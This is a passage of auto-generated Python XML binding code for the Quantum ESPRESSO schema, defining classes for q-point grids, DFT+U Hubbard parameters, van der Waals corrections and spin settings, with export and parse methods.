imported_ns_def_ = GenerateDSNamespaceDefs_.get('qpoint_gridType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='qpoint_gridType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='qpoint_gridType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='qpoint_gridType'):
if self.nqx1 is not None and 'nqx1' not in already_processed:
already_processed.add('nqx1')
outfile.write(' nqx1="%s"' % self.gds_format_integer(self.nqx1, input_name='nqx1'))
if self.nqx2 is not None and 'nqx2' not in already_processed:
already_processed.add('nqx2')
outfile.write(' nqx2="%s"' % self.gds_format_integer(self.nqx2, input_name='nqx2'))
if self.nqx3 is not None and 'nqx3' not in already_processed:
already_processed.add('nqx3')
outfile.write(' nqx3="%s"' % self.gds_format_integer(self.nqx3, input_name='nqx3'))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='qpoint_gridType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('nqx1', node)
if value is not None and 'nqx1' not in already_processed:
already_processed.add('nqx1')
try:
self.nqx1 = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.nqx1 <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
value = find_attr_value_('nqx2', node)
if value is not None and 'nqx2' not in already_processed:
already_processed.add('nqx2')
try:
self.nqx2 = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.nqx2 <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
value = find_attr_value_('nqx3', node)
if value is not None and 'nqx3' not in already_processed:
already_processed.add('nqx3')
try:
self.nqx3 = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.nqx3 <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class qpoint_gridType
class dftUType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, lda_plus_u_kind=None, Hubbard_U=None, Hubbard_J0=None, Hubbard_alpha=None, Hubbard_beta=None, Hubbard_J=None, starting_ns=None, Hubbard_ns=None, U_projection_type=None):
self.original_tagname_ = None
self.lda_plus_u_kind = lda_plus_u_kind
if Hubbard_U is None:
self.Hubbard_U = []
else:
self.Hubbard_U = Hubbard_U
if Hubbard_J0 is None:
self.Hubbard_J0 = []
else:
self.Hubbard_J0 = Hubbard_J0
if Hubbard_alpha is None:
self.Hubbard_alpha = []
else:
self.Hubbard_alpha = Hubbard_alpha
if Hubbard_beta is None:
self.Hubbard_beta = []
else:
self.Hubbard_beta = Hubbard_beta
if Hubbard_J is None:
self.Hubbard_J = []
else:
self.Hubbard_J = Hubbard_J
if starting_ns is None:
self.starting_ns = []
else:
self.starting_ns = starting_ns
if Hubbard_ns is None:
self.Hubbard_ns = []
else:
self.Hubbard_ns = Hubbard_ns
self.U_projection_type = U_projection_type
self.validate_HubbardProjType(self.U_projection_type)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, dftUType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if dftUType.subclass:
return dftUType.subclass(*args_, **kwargs_)
else:
return dftUType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_lda_plus_u_kind(self): return self.lda_plus_u_kind
def set_lda_plus_u_kind(self, lda_plus_u_kind): self.lda_plus_u_kind = lda_plus_u_kind
def get_Hubbard_U(self): return self.Hubbard_U
def set_Hubbard_U(self, Hubbard_U): self.Hubbard_U = Hubbard_U
def add_Hubbard_U(self, value): self.Hubbard_U.append(value)
def insert_Hubbard_U_at(self, index, value): self.Hubbard_U.insert(index, value)
def replace_Hubbard_U_at(self, index, value): self.Hubbard_U[index] = value
def get_Hubbard_J0(self): return self.Hubbard_J0
def set_Hubbard_J0(self, Hubbard_J0): self.Hubbard_J0 = Hubbard_J0
def add_Hubbard_J0(self, value): self.Hubbard_J0.append(value)
def insert_Hubbard_J0_at(self, index, value): self.Hubbard_J0.insert(index, value)
def replace_Hubbard_J0_at(self, index, value): self.Hubbard_J0[index] = value
def get_Hubbard_alpha(self): return self.Hubbard_alpha
def set_Hubbard_alpha(self, Hubbard_alpha): self.Hubbard_alpha = Hubbard_alpha
def add_Hubbard_alpha(self, value): self.Hubbard_alpha.append(value)
def insert_Hubbard_alpha_at(self, index, value): self.Hubbard_alpha.insert(index, value)
def replace_Hubbard_alpha_at(self, index, value): self.Hubbard_alpha[index] = value
def get_Hubbard_beta(self): return self.Hubbard_beta
def set_Hubbard_beta(self, Hubbard_beta): self.Hubbard_beta = Hubbard_beta
def add_Hubbard_beta(self, value): self.Hubbard_beta.append(value)
def insert_Hubbard_beta_at(self, index, value): self.Hubbard_beta.insert(index, value)
def replace_Hubbard_beta_at(self, index, value): self.Hubbard_beta[index] = value
def get_Hubbard_J(self): return self.Hubbard_J
def set_Hubbard_J(self, Hubbard_J): self.Hubbard_J = Hubbard_J
def add_Hubbard_J(self, value): self.Hubbard_J.append(value)
def insert_Hubbard_J_at(self, index, value): self.Hubbard_J.insert(index, value)
def replace_Hubbard_J_at(self, index, value): self.Hubbard_J[index] = value
def get_starting_ns(self): return self.starting_ns
def set_starting_ns(self, starting_ns): self.starting_ns = starting_ns
def add_starting_ns(self, value): self.starting_ns.append(value)
def insert_starting_ns_at(self, index, value): self.starting_ns.insert(index, value)
def replace_starting_ns_at(self, index, value): self.starting_ns[index] = value
def get_Hubbard_ns(self): return self.Hubbard_ns
def set_Hubbard_ns(self, Hubbard_ns): self.Hubbard_ns = Hubbard_ns
def add_Hubbard_ns(self, value): self.Hubbard_ns.append(value)
def insert_Hubbard_ns_at(self, index, value): self.Hubbard_ns.insert(index, value)
def replace_Hubbard_ns_at(self, index, value): self.Hubbard_ns[index] = value
def get_U_projection_type(self): return self.U_projection_type
def set_U_projection_type(self, U_projection_type): self.U_projection_type = U_projection_type
def validate_HubbardProjType(self, value):
# Validate type HubbardProjType, a restriction on string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['atomic', 'ortho-atomic', 'norm-atomic', 'pseudo', 'file']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on HubbardProjType' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.lda_plus_u_kind is not None or
self.Hubbard_U or
self.Hubbard_J0 or
self.Hubbard_alpha or
self.Hubbard_beta or
self.Hubbard_J or
self.starting_ns or
self.Hubbard_ns or
self.U_projection_type is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='dftUType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('dftUType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='dftUType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='dftUType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='dftUType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='dftUType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.lda_plus_u_kind is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:lda_plus_u_kind>%s</qes:lda_plus_u_kind>%s' % (self.gds_format_integer(self.lda_plus_u_kind, input_name='lda_plus_u_kind'), eol_))
for Hubbard_U_ in self.Hubbard_U:
Hubbard_U_.export(outfile, level, namespaceprefix_, name_='Hubbard_U', pretty_print=pretty_print)
for Hubbard_J0_ in self.Hubbard_J0:
Hubbard_J0_.export(outfile, level, namespaceprefix_, name_='Hubbard_J0', pretty_print=pretty_print)
for Hubbard_alpha_ in self.Hubbard_alpha:
Hubbard_alpha_.export(outfile, level, namespaceprefix_, name_='Hubbard_alpha', pretty_print=pretty_print)
for Hubbard_beta_ in self.Hubbard_beta:
Hubbard_beta_.export(outfile, level, namespaceprefix_, name_='Hubbard_beta', pretty_print=pretty_print)
for Hubbard_J_ in self.Hubbard_J:
Hubbard_J_.export(outfile, level, namespaceprefix_, name_='Hubbard_J', pretty_print=pretty_print)
for starting_ns_ in self.starting_ns:
starting_ns_.export(outfile, level, namespaceprefix_, name_='starting_ns', pretty_print=pretty_print)
for Hubbard_ns_ in self.Hubbard_ns:
Hubbard_ns_.export(outfile, level, namespaceprefix_, name_='Hubbard_ns', pretty_print=pretty_print)
if self.U_projection_type is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:U_projection_type>%s</qes:U_projection_type>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.U_projection_type), input_name='U_projection_type')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'lda_plus_u_kind' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'lda_plus_u_kind')
self.lda_plus_u_kind = ival_
elif nodeName_ == 'Hubbard_U':
obj_ = HubbardCommonType.factory()
obj_.build(child_)
self.Hubbard_U.append(obj_)
obj_.original_tagname_ = 'Hubbard_U'
elif nodeName_ == 'Hubbard_J0':
obj_ = HubbardCommonType.factory()
obj_.build(child_)
self.Hubbard_J0.append(obj_)
obj_.original_tagname_ = 'Hubbard_J0'
elif nodeName_ == 'Hubbard_alpha':
obj_ = HubbardCommonType.factory()
obj_.build(child_)
self.Hubbard_alpha.append(obj_)
obj_.original_tagname_ = 'Hubbard_alpha'
elif nodeName_ == 'Hubbard_beta':
obj_ = HubbardCommonType.factory()
obj_.build(child_)
self.Hubbard_beta.append(obj_)
obj_.original_tagname_ = 'Hubbard_beta'
elif nodeName_ == 'Hubbard_J':
obj_ = HubbardJType.factory()
obj_.build(child_)
self.Hubbard_J.append(obj_)
obj_.original_tagname_ = 'Hubbard_J'
elif nodeName_ == 'starting_ns':
obj_ = starting_nsType.factory()
obj_.build(child_)
self.starting_ns.append(obj_)
obj_.original_tagname_ = 'starting_ns'
elif nodeName_ == 'Hubbard_ns':
obj_ = Hubbard_nsType.factory()
obj_.build(child_)
self.Hubbard_ns.append(obj_)
obj_.original_tagname_ = 'Hubbard_ns'
elif nodeName_ == 'U_projection_type':
U_projection_type_ = child_.text
U_projection_type_ = self.gds_validate_string(U_projection_type_, node, 'U_projection_type')
self.U_projection_type = U_projection_type_
# validate type HubbardProjType
self.validate_HubbardProjType(self.U_projection_type)
# end class dftUType
class HubbardCommonType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, specie=None, label=None, valueOf_=None):
self.original_tagname_ = None
self.specie = _cast(None, specie)
self.label = _cast(None, label)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, HubbardCommonType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if HubbardCommonType.subclass:
return HubbardCommonType.subclass(*args_, **kwargs_)
else:
return HubbardCommonType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_specie(self): return self.specie
def set_specie(self, specie): self.specie = specie
def get_label(self): return self.label
def set_label(self, label): self.label = label
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='HubbardCommonType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('HubbardCommonType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='HubbardCommonType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='HubbardCommonType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='HubbardCommonType'):
if self.specie is not None and 'specie' not in already_processed:
already_processed.add('specie')
outfile.write(' specie=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.specie), input_name='specie')), ))
if self.label is not None and 'label' not in already_processed:
already_processed.add('label')
outfile.write(' label=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.label), input_name='label')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='HubbardCommonType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('specie', node)
if value is not None and 'specie' not in already_processed:
already_processed.add('specie')
self.specie = value
value = find_attr_value_('label', node)
if value is not None and 'label' not in already_processed:
already_processed.add('label')
self.label = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class HubbardCommonType
class HubbardJType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, specie=None, label=None, valueOf_=None):
self.original_tagname_ = None
self.specie = _cast(None, specie)
self.label = _cast(None, label)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, HubbardJType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if HubbardJType.subclass:
return HubbardJType.subclass(*args_, **kwargs_)
else:
return HubbardJType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_specie(self): return self.specie
def set_specie(self, specie): self.specie = specie
def get_label(self): return self.label
def set_label(self, label): self.label = label
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='HubbardJType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('HubbardJType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='HubbardJType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='HubbardJType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='HubbardJType'):
if self.specie is not None and 'specie' not in already_processed:
already_processed.add('specie')
outfile.write(' specie=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.specie), input_name='specie')), ))
if self.label is not None and 'label' not in already_processed:
already_processed.add('label')
outfile.write(' label=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.label), input_name='label')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='HubbardJType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('specie', node)
if value is not None and 'specie' not in already_processed:
already_processed.add('specie')
self.specie = value
value = find_attr_value_('label', node)
if value is not None and 'label' not in already_processed:
already_processed.add('label')
self.label = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class HubbardJType
class vdWType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, vdw_corr=None, non_local_term=None, london_s6=None, ts_vdw_econv_thr=None, ts_vdw_isolated=None, london_rcut=None, xdm_a1=None, xdm_a2=None, london_c6=None):
self.original_tagname_ = None
self.vdw_corr = vdw_corr
self.non_local_term = non_local_term
self.london_s6 = london_s6
self.ts_vdw_econv_thr = ts_vdw_econv_thr
self.ts_vdw_isolated = ts_vdw_isolated
self.london_rcut = london_rcut
self.xdm_a1 = xdm_a1
self.xdm_a2 = xdm_a2
if london_c6 is None:
self.london_c6 = []
else:
self.london_c6 = london_c6
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, vdWType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if vdWType.subclass:
return vdWType.subclass(*args_, **kwargs_)
else:
return vdWType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_vdw_corr(self): return self.vdw_corr
def set_vdw_corr(self, vdw_corr): self.vdw_corr = vdw_corr
def get_non_local_term(self): return self.non_local_term
def set_non_local_term(self, non_local_term): self.non_local_term = non_local_term
def get_london_s6(self): return self.london_s6
def set_london_s6(self, london_s6): self.london_s6 = london_s6
def get_ts_vdw_econv_thr(self): return self.ts_vdw_econv_thr
def set_ts_vdw_econv_thr(self, ts_vdw_econv_thr): self.ts_vdw_econv_thr = ts_vdw_econv_thr
def get_ts_vdw_isolated(self): return self.ts_vdw_isolated
def set_ts_vdw_isolated(self, ts_vdw_isolated): self.ts_vdw_isolated = ts_vdw_isolated
def get_london_rcut(self): return self.london_rcut
def set_london_rcut(self, london_rcut): self.london_rcut = london_rcut
def get_xdm_a1(self): return self.xdm_a1
def set_xdm_a1(self, xdm_a1): self.xdm_a1 = xdm_a1
def get_xdm_a2(self): return self.xdm_a2
def set_xdm_a2(self, xdm_a2): self.xdm_a2 = xdm_a2
def get_london_c6(self): return self.london_c6
def set_london_c6(self, london_c6): self.london_c6 = london_c6
def add_london_c6(self, value): self.london_c6.append(value)
def insert_london_c6_at(self, index, value): self.london_c6.insert(index, value)
def replace_london_c6_at(self, index, value): self.london_c6[index] = value
def hasContent_(self):
if (
self.vdw_corr is not None or
self.non_local_term is not None or
self.london_s6 is not None or
self.ts_vdw_econv_thr is not None or
self.ts_vdw_isolated is not None or
self.london_rcut is not None or
self.xdm_a1 is not None or
self.xdm_a2 is not None or
self.london_c6
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='vdWType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('vdWType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='vdWType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='vdWType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='vdWType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='vdWType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.vdw_corr is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:vdw_corr>%s</qes:vdw_corr>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.vdw_corr), input_name='vdw_corr')), eol_))
if self.non_local_term is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:non_local_term>%s</qes:non_local_term>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.non_local_term), input_name='non_local_term')), eol_))
if self.london_s6 is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:london_s6>%s</qes:london_s6>%s' % (self.gds_format_double(self.london_s6, input_name='london_s6'), eol_))
if self.ts_vdw_econv_thr is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ts_vdw_econv_thr>%s</qes:ts_vdw_econv_thr>%s' % (self.gds_format_double(self.ts_vdw_econv_thr, input_name='ts_vdw_econv_thr'), eol_))
if self.ts_vdw_isolated is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ts_vdw_isolated>%s</qes:ts_vdw_isolated>%s' % (self.gds_format_boolean(self.ts_vdw_isolated, input_name='ts_vdw_isolated'), eol_))
if self.london_rcut is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:london_rcut>%s</qes:london_rcut>%s' % (self.gds_format_double(self.london_rcut, input_name='london_rcut'), eol_))
if self.xdm_a1 is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:xdm_a1>%s</qes:xdm_a1>%s' % (self.gds_format_double(self.xdm_a1, input_name='xdm_a1'), eol_))
if self.xdm_a2 is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:xdm_a2>%s</qes:xdm_a2>%s' % (self.gds_format_double(self.xdm_a2, input_name='xdm_a2'), eol_))
for london_c6_ in self.london_c6:
london_c6_.export(outfile, level, namespaceprefix_, name_='london_c6', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'vdw_corr':
vdw_corr_ = child_.text
vdw_corr_ = self.gds_validate_string(vdw_corr_, node, 'vdw_corr')
self.vdw_corr = vdw_corr_
elif nodeName_ == 'non_local_term':
non_local_term_ = child_.text
non_local_term_ = self.gds_validate_string(non_local_term_, node, 'non_local_term')
self.non_local_term = non_local_term_
elif nodeName_ == 'london_s6' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'london_s6')
self.london_s6 = fval_
elif nodeName_ == 'ts_vdw_econv_thr' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ts_vdw_econv_thr')
self.ts_vdw_econv_thr = fval_
elif nodeName_ == 'ts_vdw_isolated':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'ts_vdw_isolated')
self.ts_vdw_isolated = ival_
elif nodeName_ == 'london_rcut' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'london_rcut')
self.london_rcut = fval_
elif nodeName_ == 'xdm_a1' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'xdm_a1')
self.xdm_a1 = fval_
elif nodeName_ == 'xdm_a2' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'xdm_a2')
self.xdm_a2 = fval_
elif nodeName_ == 'london_c6':
obj_ = HubbardCommonType.factory()
obj_.build(child_)
self.london_c6.append(obj_)
obj_.original_tagname_ = 'london_c6'
# end class vdWType
class spinType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, lsda=None, noncolin=None, spinorbit=None):
self.original_tagname_ = None
self.lsda = lsda
self.noncolin = noncolin
self.spinorbit = spinorbit
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, spinType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if spinType.subclass:
return spinType.subclass(*args_, **kwargs_)
else:
return spinType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_lsda(self): return self.lsda
def set_lsda(self, lsda): self.lsda = lsda
def get_noncolin(self): return self.noncolin
def set_noncolin(self, noncolin): self.noncolin = noncolin
def get_spinorbit(self): return self.spinorbit
def set_spinorbit(self, spinorbit): self.spinorbit = spinorbit
def hasContent_(self):
if (
self.lsda is not None or
self.noncolin is not None or
self.spinorbit is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='spinType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('spinType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='spinType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='spinType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='spinType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='spinType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.lsda is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:lsda>%s</qes:lsda>%s' % (self.gds_format_boolean(self.lsda, input_name='lsda'), eol_))
if self.noncolin is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:noncolin>%s</qes:noncolin>%s' % (self.gds_format_boolean(self.noncolin, input_name='noncolin'), eol_))
if self.spinorbit is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:spinorbit>%s</qes:spinorbit>%s' % (self.gds_format_boolean(self.spinorbit, input_name='spinorbit'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'lsda':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'lsda')
self.lsda = ival_
elif nodeName_ == 'noncolin':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
